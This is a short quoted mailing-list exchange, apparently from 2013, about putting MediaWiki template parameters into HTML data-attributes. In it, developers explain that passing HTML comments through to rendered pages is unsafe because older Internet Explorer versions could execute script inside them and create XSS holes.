On Tue, Jan 22, 2013 at 3:53 AM, Daniel Friesen
<daniel(a)nadir-seen-fire.com> wrote:
On Mon, 21 Jan 2013 21:50:32 -0800, Alex Brollo
<alex.brollo(a)gmail.com>
wrote:
I tried to build a template which wraps template
parameters into data-
attributes. First results have been incouraging, then I find something
logical but unexpected, crushing the whole idea.
I wrote into the code of an infobox-like template something like this:
<span data-author="{{{author}}}"
data-birthdate="{{{birthDate}}}"....></span>
and I very happily see that html code had my data wrapped into such span
tags.
But.... I was testing my code with clean templates, t.i.: templates which
have no wikicode into parameter values (as usually occurs into
it.wikisource). As soon as I tested my idea into another project (Commons)
I found that any wikicode (template call, parameter, link....) present
into
the value of infobox parameter breaks the stuff, since it is parsed and
expanded by parser with unpredictable results.
So... I ask you again: is there any sound reason (i.e. safety related,or
server loading related ) reason to avoid that HTML comments, wrapped into
raw page wikicode are sent back into html rendering as-they-are?
Alex brollo
Yes.
Thanks to IE, even comments can actually be treated as raw html and end up
executing scripts opening up XSS holes in the wiki.
Seconded. There is really no safe way to allow comments through.